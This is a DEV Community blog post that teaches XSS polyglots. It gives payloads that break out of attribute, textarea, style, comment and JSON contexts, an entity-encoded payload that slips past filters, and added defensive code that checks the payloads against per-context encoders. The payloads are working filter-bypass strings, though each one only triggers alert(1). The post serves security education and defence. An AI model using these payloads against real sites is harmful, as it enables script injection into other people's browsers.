DEV Community

Mrhili Mohamed Amine

What is a polyglot in Hacking

A polyglot, in the language sense, is a person who speaks two or more languages.

A polyglot in hacking is a single payload that is valid, or at least triggers, in two or more contexts at once, so one request tests several injection points at the same time.

XSS Polyglots: Technical Payloads
Basic Polyglot Example
A payload that breaks out of a JavaScript string context and is also markup in an HTML context.

<img src=x onerror="';alert(1)//">

This is aimed at input that is reflected in two places at once. Inside a single-quoted JavaScript string the leading ' closes the string, ;alert(1) runs and // comments out the rest of the line, so a filter that only escapes double quotes, or that encodes for one context only, does not stop it. In an HTML body the <img> tag is parsed as markup, but note the caveat: there the handler body ';alert(1)// is an unterminated string literal, so the browser raises a SyntaxError instead of firing. The string-breakout path is the one that actually works as written.

Escaping Multiple Contexts
HTML + JavaScript + SQL:

';alert(1);//--><img src=x onerror=alert(1)>"

One string probes three sinks. The leading ' and the trailing -- are the SQL string-breakout and line-comment markers (-- is a line comment in many SQL dialects): if the input reaches a SQL query unescaped, ;alert(1) is not valid SQL and the result is a syntax error, which is useful for detection but is not a working SQL exploit on its own. ';alert(1);// breaks out of a JavaScript string, --> closes an HTML comment, and <img src=x onerror=alert(1)> fires when the remainder is parsed as HTML.

Injecting Through HTML Attributes
Each of these contexts ends differently, so each needs its own breakout:

<div class="{{payload}}"></div>
<script type="text/javascript">{{payload}}</script>
<style>{{payload}}</style>
<textarea>{{payload}}</textarea>

Polyglot Payload:

" onmouseover=alert(1)//
' onmouseover=alert(1)//
</textarea><svg onload=alert(1)>

The first two lines close a double- or single-quoted attribute and add an event handler; the trailing // is a JavaScript comment that swallows the quote left over from the original attribute value, so the handler body stays valid JavaScript. </textarea> ends the element's text content, after which <svg onload=alert(1)> is parsed as markup. The <style> and <script> contexts above need the same closing-tag pattern with their own end tag; this list has no <script> entry, so that context is not covered by it.

XSS via Multiple HTML Tags
Other elements whose content the parser does not treat as ordinary markup:

<noscript>{{payload}}</noscript>
<noembed>{{payload}}</noembed>
<template>{{payload}}</template>
<select><option>{{payload}}</option></select>

Caveats for this group: <noscript> content is raw text only when scripting is enabled (with scripting disabled its children are parsed as normal markup); the content of <template> is inert, so an onload handler placed inside it never fires; and while inside <select> the parser drops most start tags, <svg> and <img> included. The payload below covers the raw-text elements from the previous section; the </noscript> and </noembed> variants appear in the combined list further down.

Polyglot Payload:

" onmouseover=alert(1)// 
' onmouseover=alert(1)// 
</textarea><svg onload=alert(1)>
</style><svg onload=alert(1)>

XSS in HTML Comments
Even comments can be abused if the input is not sanitised for them: --> ends the comment (the HTML spec also closes it on --!>), and whatever follows is parsed as markup.

<!--{{payload}}-->

Polyglot Payload:

--><svg onload=alert(1)> 

Advanced Payload Combination
Combining the per-context breakouts above gives a payload that works wherever the input lands:

<div class="{{payload}}"></div>
<textarea>{{payload}}</textarea>
<style>{{payload}}</style>
<script>{{payload}}</script>
<!--{{payload}}-->

Ultimate Polyglot Payload:

" onmouseover=alert(1)//
' onmouseover=alert(1)//
<img src onerror=alert(1)>
</textarea><svg onload=alert(1)>
</style><svg onload=alert(1)>
</noscript><svg onload=alert(1)>
</noembed><svg onload=alert(1)>
--><svg onload=alert(1)>

Each line targets one of the contexts above. Joined into one string they form a single polyglot: whichever context the input is reflected in, one segment closes that context and the remainder is parsed as markup or as a handler body. The // in the first two lines is what keeps the concatenation working in the attribute case, since it comments out everything that follows inside the handler.
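The following is an added example and not code from the original post. It takes the polyglot lines from the combined list above and runs them through every sink the post describes (attribute, textarea, style, script, comment), plus a plain-text body and a single-quoted attribute, first through an addslashes-style quote filter and then through per-context encoders, and reports which sinks each payload can still break out of. The script and style sinks are treated as a JavaScript string literal and a quoted CSS string respectively, because bare code positions cannot be fixed by encoding. All function and sink names are our own, and the breakout checks are string-level approximations of what the HTML parser does.

```javascript
// Added example (not from the original post): the post's polyglot lines against
// the sinks it lists, through a naive quote filter and through per-context
// encoders. Function names are our own; checks approximate the HTML parser.

const POLYGLOTS = [
  '" onmouseover=alert(1)//',
  "' onmouseover=alert(1)//",
  '<img src onerror=alert(1)>',
  '</textarea><svg onload=alert(1)>',
  '</style><svg onload=alert(1)>',
  '</noscript><svg onload=alert(1)>',
  '</noembed><svg onload=alert(1)>',
  '--><svg onload=alert(1)>',
];

// addslashes-style filter: backslash both quote characters and nothing else.
// A backslash means nothing to the HTML parser, so only the JS sink benefits.
function naiveQuoteEscape(s) {
  return s.replace(/["']/g, (q) => '\\' + q);
}

// HTML text, quoted attributes, RCDATA (<textarea>) and comments: entity-encode
// every character that can close a quote, a tag or a comment.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Value inside a quoted CSS string: hex-escape every non-alphanumeric character
// (the trailing space terminates the escape), so "</style" can never appear.
function encodeCssString(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => '\\' + c.charCodeAt(0).toString(16) + ' ');
}

// JavaScript string literal for an inline <script>: JSON.stringify handles
// quotes and backslashes; "<" is escaped so "</script" cannot end the element.
function encodeJsString(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// True if lit is exactly one JS string literal with no unescaped quote inside.
function isStringLiteral(lit) {
  const q = lit[0];
  if (lit.length < 2 || (q !== '"' && q !== "'") || lit[lit.length - 1] !== q) return false;
  for (let i = 1; i < lit.length - 1; i++) {
    if (lit[i] === '\\') { i++; if (i >= lit.length - 1) return false; continue; }
    if (lit[i] === q) return false;
  }
  return true;
}

// One encoder per sink. The script sink is a string literal and the style sink
// a quoted CSS string: bare code positions cannot be made safe by encoding.
const naive = {
  text: naiveQuoteEscape, attrDq: naiveQuoteEscape, attrSq: naiveQuoteEscape,
  textarea: naiveQuoteEscape, style: naiveQuoteEscape, comment: naiveQuoteEscape,
  script: (p) => "'" + naiveQuoteEscape(p) + "'",
};
const safe = {
  text: encodeHtml, attrDq: encodeHtml, attrSq: encodeHtml,
  textarea: encodeHtml, style: encodeCssString, comment: encodeHtml,
  script: encodeJsString,
};

// Names of the sinks whose encoded value can still end the context it sits in:
// <p>text</p>, <div class="attrDq">, <div title='attrSq'>, <textarea>,
// a quoted CSS string inside <style>, var v = script; inside <script>, <!--comment-->.
function breakouts(payload, enc) {
  const found = [];
  if (enc.text(payload).includes('<')) found.push('text');
  if (enc.attrDq(payload).includes('"')) found.push('attrDq');
  if (enc.attrSq(payload).includes("'")) found.push('attrSq');
  if (/<\/textarea/i.test(enc.textarea(payload))) found.push('textarea');
  if (/<\/style/i.test(enc.style(payload))) found.push('style');
  const js = enc.script(payload);
  if (!isStringLiteral(js) || /<\/script/i.test(js)) found.push('script');
  if (/--!?>/.test(enc.comment(payload))) found.push('comment');
  return found;
}

// Polyglot lines that break out of at least one sink under the given encoders.
function survivors(enc) {
  return POLYGLOTS.filter((p) => breakouts(p, enc).length > 0);
}

for (const p of POLYGLOTS) {
  console.log(JSON.stringify(p), 'naive:', breakouts(p, naive), 'safe:', breakouts(p, safe));
}
console.log('still breaking out, naive:', survivors(naive).length, 'safe:', survivors(safe).length);
```

Run with node. Under the naive filter all eight lines still break out of at least one sink (the quote-escaping protects only the JavaScript string), while under the per-context encoders none do. The lesson is the one the polyglot list is built around: a filter written for one context is bypassed by the segment aimed at a different one.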

Obfuscated Payload
HTML attribute values are entity-decoded by the parser before the event handler is compiled, so a filter that searches the raw input for the text alert never sees it, while the browser runs alert(1):

<svg/onload='&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;'>
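As an added example, not from the original post, the following minimal entity decoder shows why a filter has to normalise before it matches: run on the raw attribute value above, a blocklist never finds alert, but run on the decoded value (what the browser compiles) it does. The decoder, the two filter functions and the ENCODED constant are our own; the decoder handles decimal, hex and a handful of named references, not the full HTML entity table.

```javascript
// Added example (not from the original post): decode entities the way the
// HTML tokenizer does for attribute values, then compare a blocklist applied
// before and after decoding. All names here are our own.

const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };

// Decode decimal (&#97;), hex (&#x61;) and a few named references. References
// that are not recognised are left in place, as a browser would leave them.
function decodeEntities(s) {
  return s.replace(/&(#x([0-9a-f]+)|#([0-9]+)|([a-z]+));/gi, (m, _, hex, dec, name) => {
    if (hex) return String.fromCodePoint(parseInt(hex, 16));
    if (dec) return String.fromCodePoint(parseInt(dec, 10));
    const n = NAMED[name.toLowerCase()];
    return n === undefined ? m : n;
  });
}

// A blocklist that matches the raw input: the filter the encoded payload slips past.
function naiveBlocked(attrValue) {
  return /alert\s*\(/i.test(attrValue);
}

// The same blocklist applied to the decoded value, i.e. to what the browser compiles.
function normalizedBlocked(attrValue) {
  return /alert\s*\(/i.test(decodeEntities(attrValue));
}

// The onload value from the post's obfuscated payload.
const ENCODED = '&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;';

console.log('browser executes:', decodeEntities(ENCODED));
console.log('raw blocklist catches it:', naiveBlocked(ENCODED));
console.log('normalised blocklist catches it:', normalizedBlocked(ENCODED));
```

The point is the normalisation step, not the blocklist itself: a keyword blocklist remains weak even after decoding (there are many ways to call a function without the literal text alert), which is why encoding for the output context is the actual fix.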

JSON + XSS Polyglot
If the payload is carried inside a JSON string value:

{"key":"\"},\"anything\":\"<img src=x onerror=alert(1)>//"}

As written this is well-formed JSON: the escaped \" characters are part of the string, and JSON.parse returns the value "},"anything":"<img src=x onerror=alert(1)>// for key. Parsing executes nothing; the danger is in what the application does with the value afterwards. Written into the page with innerHTML or an unescaped template, the <img> fires. Treat decoded JSON strings as untrusted input and encode them for the context they end up in.

Conclusion
These payloads are different ways of exploiting XSS with polyglots. By targeting several contexts at once (attributes, raw-text elements, scripts and comments), one string raises the chance of finding a sink whose filtering is wrong for its context.

The approach is versatile because it covers many contexts with few characters. On the defending side the fix is the same in every case: encode for the exact context the data lands in, not for one context applied everywhere.
